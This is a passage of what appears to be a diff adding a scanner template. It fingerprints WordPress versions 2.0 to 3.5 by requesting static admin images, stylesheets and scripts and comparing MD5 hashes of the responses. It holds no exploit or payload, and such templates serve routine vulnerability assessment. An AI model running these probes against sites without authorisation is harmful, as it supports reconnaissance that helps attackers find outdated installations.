"{{BaseURL}}/wp-admin/images/logo.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"a402ef261eb443496e6179f6e9653d29\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"31ab13232b3f67b49412db6f08f0ece7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"16609cb9ee7897725e7692c17e9c29e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-vs.png" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"8720fba5c7c55ff7becb4c1ee4bff05b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/ed-bg.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"58d491c508be7f09809f11bca4a1bd77\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/logo-ghost.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"c406a787e10714b99129ff7dff95efcd\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"bcf478ea9e8c426afefd159d7377ddee\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"5bc579022c0e93463d3bab42e8f236ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/upload-fresh.png" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"aadb80b7f4e866a8568035b4dd32e55b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark-rtl-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"c5550106c0be4db9a6960d0e3de2e3ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/widgets-arrow-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"712a381eb9ac71764ea4a79febdc7cc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits-rtl-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"bfafda149631a7526d0d13c405898411\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - 
"(\"622bc5e4f63493c37b114406561c5de5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/upload-classic.png" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"7919cd151cfb4b0af5fd524f0e446635\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/toggle-arrow-rtl.gif" + matchers: + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"da61f45c1385ee6ed1663676eec4aed2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"6427a352215dc555ad24e26db148136c\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"b1627ef5a5aad512136dcef1213763ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"35ec77238a48560932bf6165a6db7e6c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/gray-grad.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"c5fd1e0895b8dec4db822fa9a3f7b92d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-toggle.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"b170bba2b2871a230b24c74f4aae6357\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits-rtl.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"7d173c47b0f3e0466298a2d6d32b039b\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"e432360b7566ff59bd6c7b4df564b713\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-arrow-frame-rtl.png" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"c9de2cf71ae15d6c01a8083dcd8e71e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/ed-bg-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"470e06ad98e744340ad5e90b11e3dce6\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - 
"(\"01112dae05c7c37e16eeb3647c138a66\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-arrow.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"c6b4cb163011e316835b02d5b277ee8a\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"e46967a00b05a38fc0a09933d8e007a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fade-butt.png" + matchers: + - type: dsl + name: 2.0 - 3.4.2 + dsl: + - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/white-grad-active.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"6b6d2eab57230f1d2afd4b6d9380fd1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"61bf26628d82152b801159a463aced6b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad-active.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"cadd565a465b3eb73ed386c210145fe2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-arrow-rtl.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"4372297e02320aa8bf7165b8d943a1ee\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"8dcc7939100a91147bb7fb6d2a651bec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/widgets-arrow.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"e46967a00b05a38fc0a09933d8e007a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/loading-publish.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"27c1513ac7487e7d4e09fd57d85dd15c\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"26166f102406bf94c0eb9f1f11987e1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-toggle-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - 
"(\"c3b5488f52e8e14daf595669d6fa7dc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"a5af317b01fd87c8eceedef87ae0c26f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wpspin_dark.gif" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"5bf61d27a7893daaf24bb158fddb550a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/required.gif" + matchers: + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"449bfee22ffa295314e08b314604cd0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/archive-link.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"9be05a7e7b41b72e75a2beddc4f6ac55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/blue-grad.png" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"91db2f4ffe2102d84a160bfb4492b3e1\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"e475da9341c39501f1c29e29756942f8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"43a14f5250893e36377b90d5f6200913\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/theme-customizer.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d19352b8d4c1ac5b0db05e44dc93f80d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/twitter-embed-1.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b0c7cba6fb42e9afa3f3bf8b6f21f71f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/twitter-embed-2.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"3b84d054f2c183a602f4941690a83575\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-media-library.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"702ae887ca351fbb1794d8f8e7860c4b\" == md5(body))" + - method: 
GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-1.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d46f56d75c89ca7083560530051ef334\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-3.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1adf3bac99c016f80215aa226c48295d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-2.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"81d618181b57d8786f71a2dc508170bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/captions-2.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"12e1605c70d4d4a3f103d16ddb89d303\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/captions-1.png" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"6e0bcf9f07953c75f042aa7f2d6a9be9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/toggle-arrow.gif" + matchers: + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"a3722fea95a66f24f350f36147bc8beb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-arrows.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"f8872ea252d5551b77eff89ff7c74dcc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"98b4f1bc5b04e9964db57b8345436465\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"f8e09b1fc524fd96735945077d401793\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/white-grad.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"3090f8947eac64830900abf4562ca8e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bfada11d185cf2a3e07371451948683a\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media-rtl.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"ed5e5527b5bd5a5bca516e801dc1dc0b\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"29596814b742292023791add824b4781\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"b6c8a448b7deb1e19bf999ea1872b2e3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"eb885d8ae8efe89bebd275b7c0233552\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fecf01b0229d493c31d174dce74dde32\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1e25dcdb02e549022ccf4ac957c7b75f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"5c6da03afe099af85d469f664b133764\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"4ce899e03ff74ffd8d9f31378d797812\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"c02acafde9e56854f48cd9943340eebe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"3b28c60d90878ef48406da99ac5389ac\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"85859614659bc971b6d6b98974d2c566\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"7598767c9c2dd108013717a842210df9\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ca960e93a6b9c81f3652cee6431369dd\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ba959fd28fc932b50466eb8e6c063c73\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"5b533d8d6bbbf363974acbb2bcd9adfd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie-rtl.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c17172cffb8640db9ad587ecc3066c93\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - 
"(\"e14594097d99bae64e75387fc935c1e2\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"ff630250c416d6e8e30e688efec04ca7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0fb82a1dfce256376ec3d4f11a542d1d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"95d14418c8e26f1bc619003f989e7d7f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"499cf9148a1b0e615afdb375f7222bf9\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"be21783cf596914ce91198a75a50ec44\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"434caaf1626b334d24612792b1db03c9\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"9de10912b5256d5d5f26e5120bff3d38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"43beb69ddff35f898e5b249f7b317ff1\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"7aa22c8e635f9cba0be4254f4a3fa48d\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"0634ce262577c85d6c6d662bc383fcfa\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"0c20f6f7180474cb13d6e8caafa596e3\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"e4b154ca2cd2b7905582930f6be58ce8\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"4d39fa68e503ff895b3896b8b30ca544\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/categories.dev.js" + matchers: + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"6fc0b70ea1595374c54e9d51aad4aa7f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"cbb0371ccea124798628e181ca157a55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/image-edit.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + 
dsl: + - "(\"5802e534c29de67f2f456a48e5f633a0\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"0a91130aa8c3188c4b753fab5cab353e\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"dd82b12700f27be19c4c5df274abbb88\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"6e43e77b45b35fab9001873b804cc81b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/comment.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"cd01b2bc20a1763b041cd4fe70b30ca8\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"08b5b8ab20cb303154b7bd30d29f627a\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"ebdf0f396c101af015d57df13c8e825b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/cat.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"ed5cc1456007f3712e9722ea27253bb2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/word-count.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"86f1a330bd23226e1e7f50887e7f9ab0\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"6db343e221160c751aa5420855fd1752\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"2e2c9c93a59d78c9004c4359a2a05161\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/gallery.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"c46e25f07876b469e084d9b0696ea235\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"188c746de47639e85ff7fc0f96ca8e85\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"14ad780f47e56304e6f5a65f909743e5\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"eb4e740117c8ff840c0bad6c23cdffbe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-tax.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"95ccf893a74335adbc415a57f81a41be\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + 
dsl: + - "(\"0e8df5b2f2da4173eaecd2cfa5cc8ef9\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"77b5a63d3b95598a6ce8b45f2ae03ee2\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"23d59c5aefc3f6f0b809e3972ba19403\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-upload.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"022faf86405feb359e17b4f00e0491cd\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"df8b4a0fa85f7535c8e4ef90a7998111\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c1bcdb3c4694c506dd64e900d12cc7a5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"2a55cde57cdb0c810aec27fdc928e1ef\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"88f97460af4cc2a479623d2f37b7005c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"61af37c5377935cadec17885b0f46e99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/password-strength-meter.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"b3d62fe0166b74696d6bc96159abdccd\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"2072440d1515a541623bd1ef77373c12\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"11983cbe1e9207fcc68697e52d0cfdc9\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e2386aeb18a7e95549bcb3b525bf8b57\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"eee80fc95481ecce7de5e9f08b0574cc\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"603da6c24a56664fe3a7bc8385cba89e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2e994cfc7fab553a8e74b80e3eda766d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d7a59df48993c4bd784b2218a9316942\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b54c11ff884ea8fcfe6e821835638da2\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-post.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"984b28a60bb245d1f91b1e1fe20ad867\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"85a780cab162664a08008fcfea5d1c67\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"11651d7c4cea9f0273e64bda5ae07a17\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"434b94f0e74fb7bf6a765cfaee697ba6\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"350b59d8f40f7cb12636382c8a3c85c5\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"9c7423f80c6bc4ad794dfe32dd94c0df\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"0803e8b6ee18cfba4bf61503f40fe9dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-suggest.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a475074c6a346983f461e0ee48269edb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2ea3d0d07d00e3f41408e089b045c670\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"511734a3a18fc5016a8303d2a09b2143\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"59e0962c585c570c002435286795dd58\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"05d8ade5450dee08850a83ca890337e5\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"82151afee85ea31377c2d756319d8d87\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"76567247a25ead81490b314336f0ac46\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fa25cfc4c116b07580ab020af64721bb\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b2645f30b7eb489d445895339405df77\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - 
"(\"21c67587ab462f90784f926d8596548e\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"779691c2375a8ec0f675bbda1fd6e376\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"5237280cf062f0466e1bb2c52b7585fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/xfn.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"d627144ce38e26b1b1fd91b5dcb503ff\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"e15936905405f555f881091a8d1ec95f\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"07f6405c0e3617f34ce1d404088fe2bb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"aa10d449951b0d66e994c71b89b27912\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"4e0dc911afce054cfeb93359fa43ec72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-gallery.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"365f0de914a67921ec1ca7f2c1f6c7fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-preview.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"36dabc552ff9315e1e782ad144ea383d\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.3 + dsl: + - "(\"842531d9bc70b047e9a413b91f66cd96\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"1594334801bab2aa5bbcac672d855780\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/utils.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a5f4880c9cca30561e9290f0dafda128\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"eb27f928ad4bdb39c07e2ff3eed95cbb\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"ff272859f10cd239e8e27cae422b6656\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-fields.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - 
"(\"87be866a7cdc94d840e6ed570c01efdd\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"06cb5141c3ac8e8abdfa887560fc9fc0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"c6d8c11219599e48d32cb3dbefe43d29\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d731591839cfd06e33776617be599982\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/plugin-install.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"45050658679cde23b3e31be7de31e526\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"1217773a91b7c15facf17f08c6366eb6\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7cd872829eeaeee63270591b89d50ce9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-background.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"56f69a07423e2580219a8d54612099fb\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"18c3b57b631f56a0dcb63f0fe5f10305\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"62230d261801142f30d52e1dc6969d28\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"72c8235ff0eea718edafee3dea558f31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/utils.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"284f0a2c317e3e094f08677e1b451c8a\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"549df3fa634602b63688d98547c6f452\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"e102613271d205d357aa317ee6c8f32b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/nav-menu.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"bfbdd5233cbb89378be6c44001491b31\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"317255427d2538b776ef410cf01bab1c\" == md5(body))" + - type: dsl + name: 3.1 - 
3.1.4 + dsl: + - "(\"ca4ec46d0208dae54597f758e1085ed7\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"4d4d1c740d3332af7e2a8ba23eba439d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload-all.js" + matchers: + - type: dsl + name: 3.2 - 3.5.1 + dsl: + - "(\"baa556317b44bc0dd82864676833540f\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"8c132780860b2d20c1837c6e05869393\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-color-picker.png" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"08b02c06a5d28b21f81069ad51963592\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/about-retina.png" + matchers: + - type: dsl + name: 